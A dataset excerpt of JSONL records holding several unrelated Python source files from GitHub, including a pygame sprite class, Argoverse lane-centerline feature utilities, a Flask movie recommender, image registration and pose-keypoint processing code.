sys.stdout.flush()\n return tub, ordering\n","repo_name":"ASchidler/tw-sv","sub_path":"ctw/solve_ctw.py","file_name":"solve_ctw.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"33596664415","text":"import pygame\nimport time\npygame.init()\ndisplay_width = 900\ndisplay_height = 600\ngameDisplay = pygame.display.set_mode((display_width, display_height))\n\nclass Player:\n\n\tdef __init__(self, position, imglist, jumpsprite, fallsprite):\n\t\tself.xpos = position[0]\n\t\tself.ypos = position[1]\n\t\tself.imglist = imglist\n\t\tself.jumpsprite = jumpsprite\n\t\tself.fallsprite = fallsprite\n\t\tself.stillsprite = imglist[8]\n\t\tself.imgtrack = 0\n\t\tself.xvel = 0\n\t\tself.yvel = 0\n\t\tself.maxvel = 5\n\t\tself.flip = False\n\t\tself.jumping = False\n\t\tself.falling = False\n\t\tself.still = True\n\n\tdef place(self, posx, posy):\n\t\tif not self.jumping and not self.falling and not self.still:\n\t\t\tif not self.flip:\n\t\t\t\tgameDisplay.blit(self.imglist[self.imgtrack], (posx, posy))\n\t\t\t\tself.imgtrack = (self.imgtrack + 1) % len(self.imglist)\n\t\t\telse:\n\t\t\t\tgameDisplay.blit(pygame.transform.flip(self.imglist[self.imgtrack], True, False), (posx, posy))\n\t\t\t\tself.imgtrack = (self.imgtrack + 1) % len(self.imglist)\n\t\telse:\n\t\t\tif self.still:\n\t\t\t\tif not self.flip:\n\t\t\t\t\tgameDisplay.blit(self.stillsprite, (posx, posy))\n\t\t\t\telse:\n\t\t\t\t\tgameDisplay.blit(pygame.transform.flip(self.stillsprite, True, False), (posx, posy))\n\t\t\telif self.jumping:\n\t\t\t\tif not self.flip:\n\t\t\t\t\tgameDisplay.blit(self.jumpsprite, (posx, posy))\n\t\t\t\telse:\n\t\t\t\t\tgameDisplay.blit(pygame.transform.flip(self.jumpsprite, True, False), (posx, posy))\n\t\t\telif self.falling:\n\t\t\t\tif not self.flip:\n\t\t\t\t\tgameDisplay.blit(self.fallsprite, (posx, posy))\n\t\t\t\telse:\n\t\t\t\t\tgameDisplay.blit(pygame.transform.flip(self.fallsprite, True, False), (posx, posy))","repo_name":"andychau/Shooter","sub_path":"PlayerClass.py","file_name":"PlayerClass.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"25169179486","text":"\"\"\"This module is used for computing map features for motion forecasting baselines.\"\"\"\n\nfrom typing import Any, Dict, List, Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom shapely.geometry import LineString, Point, Polygon\nfrom shapely.ops import cascaded_union\n\nfrom argoverse.map_representation.map_api import ArgoverseMap\nfrom argoverse.utils.centerline_utils import (\n get_nt_distance,\n remove_overlapping_lane_seq,\n)\nfrom argoverse.utils.mpl_plotting_utils import visualize_centerline\nfrom utils.baseline_config import (\n _MANHATTAN_THRESHOLD,\n _DFS_THRESHOLD_FRONT_SCALE,\n _DFS_THRESHOLD_BACK_SCALE,\n _MAX_SEARCH_RADIUS_CENTERLINES,\n _MAX_CENTERLINE_CANDIDATES_TEST,\n)\n\n\nclass MapFeaturesUtils:\n \"\"\"Utils for computation of map-based features.\"\"\"\n def __init__(self):\n \"\"\"Initialize class.\"\"\"\n self._MANHATTAN_THRESHOLD = _MANHATTAN_THRESHOLD\n self._DFS_THRESHOLD_FRONT_SCALE = _DFS_THRESHOLD_FRONT_SCALE\n self._DFS_THRESHOLD_BACK_SCALE = _DFS_THRESHOLD_BACK_SCALE\n self._MAX_SEARCH_RADIUS_CENTERLINES = _MAX_SEARCH_RADIUS_CENTERLINES\n self._MAX_CENTERLINE_CANDIDATES_TEST = _MAX_CENTERLINE_CANDIDATES_TEST\n\n def get_point_in_polygon_score(self, lane_seq: List[int],\n xy_seq: np.ndarray, city_name: str,\n avm: ArgoverseMap) -> int:\n \"\"\"Get the number of coordinates that lie insde the lane seq polygon.\n\n Args:\n lane_seq: Sequence of lane ids\n xy_seq: Trajectory coordinates\n city_name: City name (PITT/MIA)\n avm: Argoverse map_api instance\n Returns:\n point_in_polygon_score: Number of coordinates in the trajectory that lie within the lane sequence\n\n \"\"\"\n lane_seq_polygon = cascaded_union([\n Polygon(avm.get_lane_segment_polygon(lane, city_name)).buffer(0)\n for lane in lane_seq\n ])\n point_in_polygon_score = 0\n for xy in xy_seq:\n point_in_polygon_score += lane_seq_polygon.contains(Point(xy))\n return point_in_polygon_score\n\n def sort_lanes_based_on_point_in_polygon_score(\n self,\n lane_seqs: List[List[int]],\n xy_seq: np.ndarray,\n city_name: str,\n avm: ArgoverseMap,\n ) -> List[List[int]]:\n \"\"\"Filter lane_seqs based on the number of coordinates inside the bounding polygon of lanes.\n\n Args:\n lane_seqs: Sequence of lane sequences\n xy_seq: Trajectory coordinates\n city_name: City name (PITT/MIA)\n avm: Argoverse map_api instance\n Returns:\n sorted_lane_seqs: Sequences of lane sequences sorted based on the point_in_polygon score\n\n \"\"\"\n point_in_polygon_scores = []\n for lane_seq in lane_seqs:\n point_in_polygon_scores.append(\n self.get_point_in_polygon_score(lane_seq, xy_seq, city_name,\n avm))\n randomized_tiebreaker = np.random.random(len(point_in_polygon_scores))\n sorted_point_in_polygon_scores_idx = np.lexsort(\n (randomized_tiebreaker, np.array(point_in_polygon_scores)))[::-1]\n sorted_lane_seqs = [\n lane_seqs[i] for i in sorted_point_in_polygon_scores_idx\n ]\n sorted_scores = [\n point_in_polygon_scores[i]\n for i in sorted_point_in_polygon_scores_idx\n ]\n return sorted_lane_seqs, sorted_scores\n\n def get_heuristic_centerlines_for_test_set(\n self,\n lane_seqs: List[List[int]],\n xy_seq: np.ndarray,\n city_name: str,\n avm: ArgoverseMap,\n max_candidates: int,\n scores: List[int],\n ) -> List[np.ndarray]:\n \"\"\"Sort based on distance along centerline and return the centerlines.\n \n Args:\n lane_seqs: Sequence of lane sequences\n xy_seq: Trajectory coordinates\n city_name: City name (PITT/MIA)\n avm: Argoverse map_api instance\n max_candidates: Maximum number of centerlines to return\n Return:\n sorted_candidate_centerlines: Centerlines in the order of their score \n\n \"\"\"\n aligned_centerlines = []\n diverse_centerlines = []\n diverse_scores = []\n num_candidates = 0\n\n # Get first half as aligned centerlines\n aligned_cl_count = 0\n for i in range(len(lane_seqs)):\n lane_seq = lane_seqs[i]\n score = scores[i]\n diverse = True\n centerline = avm.get_cl_from_lane_seq([lane_seq], city_name)[0]\n if aligned_cl_count < int(max_candidates / 2):\n start_dist = LineString(centerline).project(Point(xy_seq[0]))\n end_dist = LineString(centerline).project(Point(xy_seq[-1]))\n if end_dist > start_dist:\n aligned_cl_count += 1\n aligned_centerlines.append(centerline)\n diverse = False\n if diverse:\n diverse_centerlines.append(centerline)\n diverse_scores.append(score)\n\n num_diverse_centerlines = min(len(diverse_centerlines),\n max_candidates - aligned_cl_count)\n test_centerlines = aligned_centerlines\n if num_diverse_centerlines > 0:\n probabilities = ([\n float(score + 1) / (sum(diverse_scores) + len(diverse_scores))\n for score in diverse_scores\n ] if sum(diverse_scores) > 0 else [1.0 / len(diverse_scores)] *\n len(diverse_scores))\n diverse_centerlines_idx = np.random.choice(\n range(len(probabilities)),\n num_diverse_centerlines,\n replace=False,\n p=probabilities,\n )\n diverse_centerlines = [\n diverse_centerlines[i] for i in diverse_centerlines_idx\n ]\n test_centerlines += diverse_centerlines\n\n return test_centerlines\n\n def get_candidate_centerlines_for_trajectory(\n self,\n xy: np.ndarray,\n city_name: str,\n avm: ArgoverseMap,\n viz: bool = False,\n max_search_radius: float = 50.0,\n seq_len: int = 50,\n max_candidates: int = 10,\n mode: str = \"test\",\n ) -> List[np.ndarray]:\n \"\"\"Get centerline candidates upto a threshold.\n\n Algorithm:\n 1. Take the lanes in the bubble of last observed coordinate\n 2. Extend before and after considering all possible candidates\n 3. Get centerlines based on point in polygon score.\n\n Args:\n xy: Trajectory coordinates, \n city_name: City name, \n avm: Argoverse map_api instance, \n viz: Visualize candidate centerlines, \n max_search_radius: Max search radius for finding nearby lanes in meters,\n seq_len: Sequence length, \n max_candidates: Maximum number of centerlines to return, \n mode: train/val/test mode\n\n Returns:\n candidate_centerlines: List of candidate centerlines\n\n \"\"\"\n # Get all lane candidates within a bubble\n curr_lane_candidates = avm.get_lane_ids_in_xy_bbox(\n xy[-1, 0], xy[-1, 1], city_name, self._MANHATTAN_THRESHOLD)\n\n # Keep expanding the bubble until at least 1 lane is found\n while (len(curr_lane_candidates) < 1\n and self._MANHATTAN_THRESHOLD < max_search_radius):\n self._MANHATTAN_THRESHOLD *= 2\n curr_lane_candidates = avm.get_lane_ids_in_xy_bbox(\n xy[-1, 0], xy[-1, 1], city_name, self._MANHATTAN_THRESHOLD)\n\n assert len(curr_lane_candidates) > 0, \"No nearby lanes found!!\"\n\n # Set dfs threshold\n traj_len = xy.shape[0]\n\n # Assuming a speed of 50 mps, set threshold for traversing in the front and back\n dfs_threshold_front = (self._DFS_THRESHOLD_FRONT_SCALE *\n (seq_len + 1 - traj_len) / 10)\n dfs_threshold_back = self._DFS_THRESHOLD_BACK_SCALE * (traj_len +\n 1) / 10\n\n # DFS to get all successor and predecessor candidates\n obs_pred_lanes: List[Sequence[int]] = []\n for lane in curr_lane_candidates:\n candidates_future = avm.dfs(lane, city_name, 0,\n dfs_threshold_front)\n candidates_past = avm.dfs(lane, city_name, 0, dfs_threshold_back,\n True)\n\n # Merge past and future\n for past_lane_seq in candidates_past:\n for future_lane_seq in candidates_future:\n assert (\n past_lane_seq[-1] == future_lane_seq[0]\n ), \"Incorrect DFS for candidate lanes past and future\"\n obs_pred_lanes.append(past_lane_seq + future_lane_seq[1:])\n\n # Removing overlapping lanes\n obs_pred_lanes = remove_overlapping_lane_seq(obs_pred_lanes)\n\n # Sort lanes based on point in polygon score\n obs_pred_lanes, scores = self.sort_lanes_based_on_point_in_polygon_score(\n obs_pred_lanes, xy, city_name, avm)\n\n # If the best centerline is not along the direction of travel, re-sort\n if mode == \"test\":\n candidate_centerlines = self.get_heuristic_centerlines_for_test_set(\n obs_pred_lanes, xy, city_name, avm, max_candidates, scores)\n else:\n candidate_centerlines = avm.get_cl_from_lane_seq(\n [obs_pred_lanes[0]], city_name)\n\n if viz:\n plt.figure(0, figsize=(8, 7))\n for centerline_coords in candidate_centerlines:\n visualize_centerline(centerline_coords)\n plt.plot(\n xy[:, 0],\n xy[:, 1],\n \"-\",\n color=\"#d33e4c\",\n alpha=1,\n linewidth=3,\n zorder=15,\n )\n\n final_x = xy[-1, 0]\n final_y = xy[-1, 1]\n\n plt.plot(\n final_x,\n final_y,\n \"o\",\n color=\"#d33e4c\",\n alpha=1,\n markersize=10,\n zorder=15,\n )\n plt.xlabel(\"Map X\")\n plt.ylabel(\"Map Y\")\n plt.axis(\"off\")\n plt.title(f\"Number of candidates = {len(candidate_centerlines)}\")\n plt.show()\n\n return candidate_centerlines\n\n def compute_map_features(\n self,\n agent_track: np.ndarray,\n obs_len: int,\n seq_len: int,\n raw_data_format: Dict[str, int],\n mode: str,\n ) -> Tuple[np.ndarray, Dict[str, Any]]:\n \"\"\"Compute map based features for the given sequence.\n\n If the mode is test, oracle_nt_dist will be empty, candidate_nt_dist will be populated.\n If the mode is train/val, oracle_nt_dist will be populated, candidate_nt_dist will be empty.\n\n Args:\n agent_track : Data for the agent track\n obs_len : Length of observed trajectory\n seq_len : Length of the sequence\n raw_data_format : Format of the sequence\n mode: train/val/test mode\n \n Returns:\n oracle_nt_dist (numpy array): normal and tangential distances for oracle centerline\n map_feature_helpers (dict): Dictionary containing helpers for map features\n\n \"\"\"\n # Get observed 2 secs of the agent\n agent_xy = agent_track[:, [raw_data_format[\"X\"], raw_data_format[\"Y\"]\n ]].astype(\"float\")\n agent_track_obs = agent_track[:obs_len]\n agent_xy_obs = agent_track_obs[:, [\n raw_data_format[\"X\"], raw_data_format[\"Y\"]\n ]].astype(\"float\")\n\n # Get API for Argo Dataset map\n avm = ArgoverseMap()\n\n city_name = agent_track[0, raw_data_format[\"CITY_NAME\"]]\n\n # Get candidate centerlines using observed trajectory\n if mode == \"test\":\n oracle_centerline = np.full((seq_len, 2), None)\n oracle_nt_dist = np.full((seq_len, 2), None)\n candidate_centerlines = self.get_candidate_centerlines_for_trajectory(\n agent_xy_obs,\n city_name,\n avm,\n viz=False,\n max_search_radius=self._MAX_SEARCH_RADIUS_CENTERLINES,\n seq_len=seq_len,\n max_candidates=self._MAX_CENTERLINE_CANDIDATES_TEST,\n )\n\n # Get nt distance for the entire trajectory using candidate centerlines\n candidate_nt_distances = []\n for candidate_centerline in candidate_centerlines:\n candidate_nt_distance = np.full((seq_len, 2), None)\n candidate_nt_distance[:obs_len] = get_nt_distance(\n agent_xy_obs, candidate_centerline)\n candidate_nt_distances.append(candidate_nt_distance)\n\n else:\n oracle_centerline = self.get_candidate_centerlines_for_trajectory(\n agent_xy,\n city_name,\n avm,\n viz=False,\n max_search_radius=self._MAX_SEARCH_RADIUS_CENTERLINES,\n seq_len=seq_len,\n mode=mode,\n )[0]\n candidate_centerlines = [np.full((seq_len, 2), None)]\n candidate_nt_distances = [np.full((seq_len, 2), None)]\n\n # Get NT distance for oracle centerline\n oracle_nt_dist = get_nt_distance(agent_xy,\n oracle_centerline,\n viz=False)\n\n map_feature_helpers = {\n \"ORACLE_CENTERLINE\": oracle_centerline,\n \"CANDIDATE_CENTERLINES\": candidate_centerlines,\n \"CANDIDATE_NT_DISTANCES\": candidate_nt_distances,\n }\n\n return oracle_nt_dist, map_feature_helpers\n","repo_name":"jagjeet-singh/argoverse-forecasting","sub_path":"utils/map_features_utils.py","file_name":"map_features_utils.py","file_ext":"py","file_size_in_byte":14206,"program_lang":"python","lang":"en","doc_type":"code","stars":228,"dataset":"github-code","pt":"36"}
+{"seq_id":"6822986820","text":"from flask import Flask, jsonify, request\nimport pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport os\n\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n\ndf = pd.read_csv(\"all_movies.csv\")\n\nid = []\ntitle = []\ncorpus = []\ndetails_by_id = {}\n\nfor index, row in df.iterrows():\n id.append(str(row['id']))\n title.append(row['title'])\n corpus.append(row['corpus'])\n details_by_id[str(row['id'])] = {\n \"title\": row['title'], \"corpus\": row['corpus'], \"backdrop\": row['backdrop'], \"poster\": row['poster']}\n\nvectorizer = TfidfVectorizer()\ntfidf_matrix = vectorizer.fit_transform(corpus)\n\ngenres = {}\n\nfor root, dirs, files in os.walk(\"./genres\"):\n for file_name in files:\n genre = file_name[:-4]\n file_path = os.path.join(root, file_name)\n df = pd.read_csv(file_path)\n df = df.drop('corpus', axis=1)\n df = df.fillna('')\n data = df.to_dict('records')\n genres[genre] = data\n\n\ndef find_similar_corpus(query, tfidf_matrix):\n query_vector = vectorizer.transform([query])\n similarity_scores = cosine_similarity(query_vector, tfidf_matrix).flatten()\n sorted_indices = np.argsort(similarity_scores)[::-1]\n return sorted_indices, similarity_scores\n\n\ndef find_similar_movies(_ids, k):\n l = 4\n movies = []\n added_movie_ids = set(_ids)\n count = 0\n for _id in _ids:\n if count > 15:\n break\n _corpus = details_by_id[_id][\"corpus\"]\n indices, sim_scores = find_similar_corpus(_corpus, tfidf_matrix)\n for i in range(1, l):\n index = indices[i]\n movie_id = id[index]\n if movie_id and title[index] and movie_id not in added_movie_ids:\n count += 1\n added_movie_ids.add(movie_id)\n poster = details_by_id[movie_id][\"poster\"]\n backdrop = details_by_id[movie_id][\"backdrop\"]\n if not backdrop:\n backdrop = \"\"\n if not poster:\n poster = \"\"\n movies.append({\n \"id\": movie_id,\n \"title\": title[index],\n \"backdrop\": backdrop,\n \"poster\": poster\n })\n else:\n l += 1\n return movies\n\n\nall_movies = []\ndf2 = pd.read_csv(\"all_movies.csv\")\ndf2 = df2.drop('corpus', axis=1)\ndf2 = df2.fillna('')\ndata = df2.to_dict('records')\nall_movies = data\n\n\n@app.route(\"/\")\ndef index():\n return \"Welcome to movie recommender\"\n\n\n@app.route(\"/get_recommendations//\")\ndef similar_movies(ids, k):\n ids = ids.split(\"|\")\n sim_movies = find_similar_movies(ids, k)\n return jsonify(sim_movies)\n\n\n@app.route(\"/get_genre_movies/\")\ndef genre_movies(genre):\n return jsonify(genres[genre])\n\n\n@app.route(\"/get_all_movies\")\ndef get_all_movies():\n return jsonify(all_movies)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n# flask --app app.py --debug run\n","repo_name":"walker-617/Recommender-Engine","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"39579146339","text":"file = './2/input.txt'\nwith open(file) as fn:\n raw = fn.read()\n\nt = {\n \"A\": \"r\",\n \"X\": \"r\",\n \"B\": \"p\",\n \"Y\": \"p\",\n \"C\": \"s\",\n \"Z\": \"s\",\n}\n\np = {\n \"r\": 1,\n \"p\": 2,\n \"s\": 3,\n}\n\nw = {\n \"r\": \"p\",\n \"p\": \"s\",\n \"s\": \"r\",\n}\n\nl = {v: k for k, v in w.items()}\n\ndef score(a):\n r = p[a[1]]\n if a[0] == a[1]:\n return r + 3\n if w[a[0]] == a[1]:\n return r + 6\n return r\n\ndef transform(a):\n a[0] = t[a[0]]\n if a[1] == 'Y':\n a[1] = a[0]\n if a[1] == 'Z':\n a[1] = w[a[0]]\n if a[1] == 'X':\n a[1] = l[a[0]]\n return a\n\nparsed = [ score([ t[i] for i in ln.split(\" \") ]) for ln in raw.splitlines() ]\nprint(sum(parsed))\nparsed = [ score(transform(ln.split(\" \"))) for ln in raw.splitlines() ]\nprint(sum(parsed))","repo_name":"PhilippLange/aoc_2022","sub_path":"02/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"29450839101","text":"import cv2\nimport numpy as np\n\n\ndef image_registration(img_1_clr, img_2_clr, n=15000):\n img_1 = cv2.cvtColor(img_1_clr, cv2.COLOR_BGR2GRAY)\n img_2 = cv2.cvtColor(img_2_clr, cv2.COLOR_BGR2GRAY)\n height, width = img_2.shape\n\n # ORB detector\n orb_detector = cv2.ORB_create(n)\n\n kp1, d1 = orb_detector.detectAndCompute(img_1, None)\n kp2, d2 = orb_detector.detectAndCompute(img_2, None)\n\n matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n matches = matcher.match(d1, d2)\n matches.sort(key=lambda x: x.distance)\n\n matches = matches[: int(len(matches) * 0.7)]\n no_of_matches = len(matches)\n\n p1 = np.zeros((no_of_matches, 2))\n p2 = np.zeros((no_of_matches, 2))\n\n for i in range(len(matches)):\n p1[i, :] = kp1[matches[i].queryIdx].pt\n p2[i, :] = kp2[matches[i].trainIdx].pt\n\n homography, mask = cv2.findHomography(p1, p2, cv2.RANSAC)\n\n crop_1 = cv2.warpPerspective(img_1_clr, homography, (width, height))\n crop_2 = img_2_clr\n\n return crop_1, crop_2\n","repo_name":"alexandraroots/post_stamps","sub_path":"image_registration.py","file_name":"image_registration.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"5926829549","text":"import os\nimport os.path as osp\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\nimport random\nimport cv2\nimport argparse\nimport math\n\nimport tensorflow as tf\n\n# for tensorflow_cpn\nfrom config import cfg\nfrom dataset import Preprocessing\n\n# for keras_retinanet\nfrom keras_retinanet.utils.image import preprocess_image, resize_image\n\ndef draw_bounding_box(frame, person_dets):\n\n\tx, y, w, h = person_dets\n\n\ttop = max(0, np.floor(x + 0.5).astype(int))\n\tleft = max(0, np.floor(y + 0.5).astype(int))\n\tright = min(frame.shape[1], np.floor(x + w + 0.5).astype(int))\n\tbottom = min(frame.shape[0], np.floor(y + h + 0.5).astype(int))\n\n\tcv2.rectangle(frame, (top, left), (right, bottom), (255, 0, 0), 2)\n\n\ndef read_pb_return_tensors(graph, pb_file, return_elements):\n\n\twith tf.gfile.FastGFile(pb_file, 'rb') as f:\n\t\tfrozen_graph_def = tf.GraphDef()\n\t\tfrozen_graph_def.ParseFromString(f.read())\n\n\twith graph.as_default():\n\t\treturn_elements = tf.import_graph_def(frozen_graph_def,\n\t\t\t\t\t\treturn_elements=return_elements)\n\treturn return_elements\n\n\ndef crop(pose_img, person_dets):\n\n\t# cls_dets : x1, y1, x2, y2, score\n\tcls_dets = np.zeros((1, 4), dtype=np.float32)\n\t# test_data : x, y, w, h, score\n\ttest_data = np.zeros((1, 4), dtype=np.float32)\n\n\ttest_data[:] = person_dets[:]\n\n\tbbox = np.asarray(test_data[0])\n\tcls_dets[0, :4] = np.array([bbox[0], bbox[1], bbox[0] + bbox[2], bbox[1] + bbox[3]])\n\n\ttest_imgs = []\n\tdetails = []\n\n\t# cropping\n\ttest_img, detail = Preprocessing(pose_img, test_data[0], stage='test')\n\n\tdetails.append(detail)\n\n\tdetails = np.asarray(details).astype(np.float32)\n\n\tfeed = test_img\n\n\tdata = [feed.transpose(0, 2, 3, 1).astype(np.float32)]\n\n\treturn data, details\n\ndef keypoint_detection(res, details):\n\n\tflat = [0.0 for i in range(cfg.nr_skeleton * 2)]\n\tcls_skeleton = np.zeros((1, cfg.nr_skeleton, 3)).astype(np.float32)\n\tcrops = np.zeros((1, 4)).astype(np.float32)\n\n\tres = res.transpose(0, 3, 1, 2)\n\n\t# single map\n\tr0 = res[0].copy()\n\tr0 /= 255.\n\tr0 += 0.5\n\n\tfor w in range(cfg.nr_skeleton):\n\t\tres[0, w] /= np.amax(res[0, w])\n\tborder = 10\n\tdr = np.zeros((cfg.nr_skeleton, cfg.output_shape[0] + 2 * border, cfg.output_shape[1] + 2 * border))\n\tdr[:, border:-border, border:-border] = res[:cfg.nr_skeleton].copy()\n\n\tfor w in range(cfg.nr_skeleton):\n\t\tdr[w] = cv2.GaussianBlur(dr[w], (21, 21), 0)\n\tfor w in range(cfg.nr_skeleton):\n\t\tlb = dr[w].argmax()\n\t\ty, x = np.unravel_index(lb, dr[w].shape)\n\t\tdr[w, y, x] = 0\n\t\tlb = dr[w].argmax()\n\t\tpy, px = np.unravel_index(lb, dr[w].shape)\n\t\ty -= border\n\t\tx -= border\n\t\tpy -= border + y\n\t\tpx -= border + x\n\t\tln = (px ** 2 + py ** 2) ** 0.5\n\t\tdelta = 0.25\n\t\tif ln > 1e-3:\n\t\t\tx += delta * px / ln\n\t\t\ty += delta * py / ln\n\t\tx = max(0, min(x, cfg.output_shape[1] - 1))\n\t\ty = max(0, min(y, cfg.output_shape[0] - 1))\n\t\tcls_skeleton[0, w, :2] = (x * 4 + 2, y * 4 + 2)\n\t\tcls_skeleton[0, w, 2] = r0[w, int(round(y) + 1e-10), int(round(x) + 1e-10)]\n\n\t# map back to original images\n\tcrops[0, :] = details[0, :]\n\tfor w in range(cfg.nr_skeleton):\n\t\tcls_skeleton[0, w, 0] = cls_skeleton[0, w, 0] / cfg.data_shape[1] * (\n\t\t\t\t\tcrops[0][2] - crops[0][0]) + crops[0][0]\n\t\tcls_skeleton[0, w, 1] = cls_skeleton[0, w, 1] / cfg.data_shape[0] * (\n\t\t\t\t\tcrops[0][3] - crops[0][1]) + crops[0][1]\n\n\t# flat is keypoints(17)\n\tfor w in range(cfg.nr_skeleton):\n\t\tflat[w*2] = cls_skeleton[0, w, 0]\n\t\tflat[w*2+1] = cls_skeleton[0, w, 1]\n\n\treturn flat\n\ndef upper_detection(frame, flat, person_dets):\n\n\t# upper detection & lower keypoint remove\n\tupper = False\n\n\t\"\"\"\n\tlower keypoint remove using keypoint of hip, knee\n\n\tl_hip_y , r_hip_y : flat[23], flat[25] or cls_skeleton[0, 11, 1], cls_skeleton[0, 12, 1]\n\tl_knee_y, r_knee_y : flat[27], flat[29] or cls_skeleton[0, 13, 1], cls_skeleton[0, 14, 1]\n\n\t\"\"\"\n\n\tl_hip_y = flat[23]\n\tr_hip_y = flat[25]\n\t\n\tl_knee_y = flat[27]\n\tr_knee_y = flat[29]\n\n\tbbox_y = person_dets[1] + person_dets[3]\n\n\n\t# remove based on hip keypoint\n\thip_distance_r = r_hip_y - bbox_y\n\thip_distance_l = l_hip_y - bbox_y\n\n\t# remove based on knee keypoint \n\tknee_distance_r = r_knee_y - bbox_y\n\tknee_distance_l = l_knee_y - bbox_y\n\n\t# remove based on bounding box (frame.shape[0] = 720)\n\tbox_distance = bbox_y - frame.shape[0]\n\n\t\n\thip_distance_r = abs(hip_distance_r)\n\thip_distance_l = abs(hip_distance_l)\n\tknee_distance_r = abs(knee_distance_r)\n\tknee_distance_l = abs(knee_distance_l)\n\tbox_distance = abs(box_distance)\n\n\n\tif ((hip_distance_r < 110 and hip_distance_l < 110 and box_distance < 30) or (knee_distance_r < 50 and knee_distance_l < 50 and box_distance < 30)):\n\t\tupper = True\n\t\t\n\t\t# remove lower (knee, ankle) keypoint\n\t\tfor i in range(26, 34):\n\t\t\tflat[i] = 0.0\n\n\treturn flat, upper\n\n\ndef draw_skeleton(aa, kp, upper=False):\n\n\t#upper = False\n\n\tshow_skeleton_labels = False\n\n\tkp = np.array(kp).astype(int)\n\tkp = kp.reshape(17, 2)\n\n\tkp_names = ['nose', 'l_eye', 'r_eye', 'l_ear', 'r_ear', 'l_shoulder', \n\t\t\t'r_shoulder', 'l_elbow', 'r_elbow', 'l_wrist', 'r_wrist', \n\t\t\t'l_hip', 'r_hip', 'l_knee', 'r_knee', 'l_ankle', 'r_ankle']\n\n\tskeleton = [[16, 14], [14, 12], [17, 15], [15, 13], [12, 13], [6, 12], [7, 13], [6, 7], [6, 8], [7, 9], [8, 10], [9, 11], [2, 3], [1, 2], [1, 3], [2, 4], [3, 5], [4, 6], [5, 7]]\n\n\t# remove lower (knee, ankle) \n\tif upper :\n\t\tskeleton = skeleton[4:]\t\n\t\tkp_names = kp_names[:13]\n\t\tkp = kp[:13]\n\n\tfor i, j in skeleton:\n\t\tif kp[i-1][0] >= 0 and kp[i-1][1] >= 0 and kp[j-1][0] >= 0 and kp[j-1][1] >= 0 and \\\n\t\t\t(len(kp[i-1]) <= 2 or (len(kp[i-1]) > 2 and kp[i-1][2] > 0.1 and kp[j-1][2] > 0.1)):\n\t\t\tcv2.line(aa, tuple(kp[i-1][:2]), tuple(kp[j-1][:2]), (0,255,255), 2)\n\tfor j in range(len(kp)):\n\t\tif kp[j][0] >= 0 and kp[j][1] >= 0:\n\n\t\t\tif len(kp[j]) <= 2 or (len(kp[j]) > 2 and kp[j][2] > 1.1):\n\t\t\t\tcv2.circle(aa, tuple(kp[j][:2]), 2, tuple((0,0,255)), 2)\n\t\t\telif len(kp[j]) <= 2 or (len(kp[j]) > 2 and kp[j][2] > 0.1):\n\t\t\t\tcv2.circle(aa, tuple(kp[j][:2]), 2, tuple((255,0,0)), 2)\n\n\t\t\tif show_skeleton_labels and (len(kp[j]) <= 2 or (len(kp[j]) > 2 and kp[j][2] > 0.1)):\n\t\t\t\tcv2.putText(aa, kp_names[j], tuple(kp[j][:2]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 0))\n\n\n\n","repo_name":"eehoeskrap/tensorrt_cpn","sub_path":"Processing.py","file_name":"Processing.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"15769509798","text":"import random\nimport numpy as np\nimport sys\n\nf = open('perturbations.txt', 'w')\nwith open(\"pfm_all.txt\") as handle:\n for m in motifs.parse(handle, \"jaspar\"):\n counts = m.counts\n values = list()\n ncol = len(counts[1,:])\n for x in range(0,ncol): \n for y in range(0,4):\n values.append(counts[y,x])\n new_counts = np.reshape(np.matrix(values), (4,ncol), order=\"F\")\n for x in range(0,ncol):\n for y in range(0,20):\n a = random.randint(0,3)\n b = random.randint(0,3)\n old_a = new_counts[a,x]\n old_b = new_counts[b,x]\n new_counts[a,x] = old_b\n new_counts[b,x] = old_a\n f.write(\">%s %s\\n\"%(m.matrix_id,m.name))\n for x in range(0,4):\n for y in range(0, ncol):\n f.write(str(int(new_counts[x,y])))\n f.write(\"\\t\")\n f.write(\"\\n\")\n\nf.close() \n","repo_name":"ReddyLab/TransversionsInRegElements","sub_path":"Perturb_motif_rows.py","file_name":"Perturb_motif_rows.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
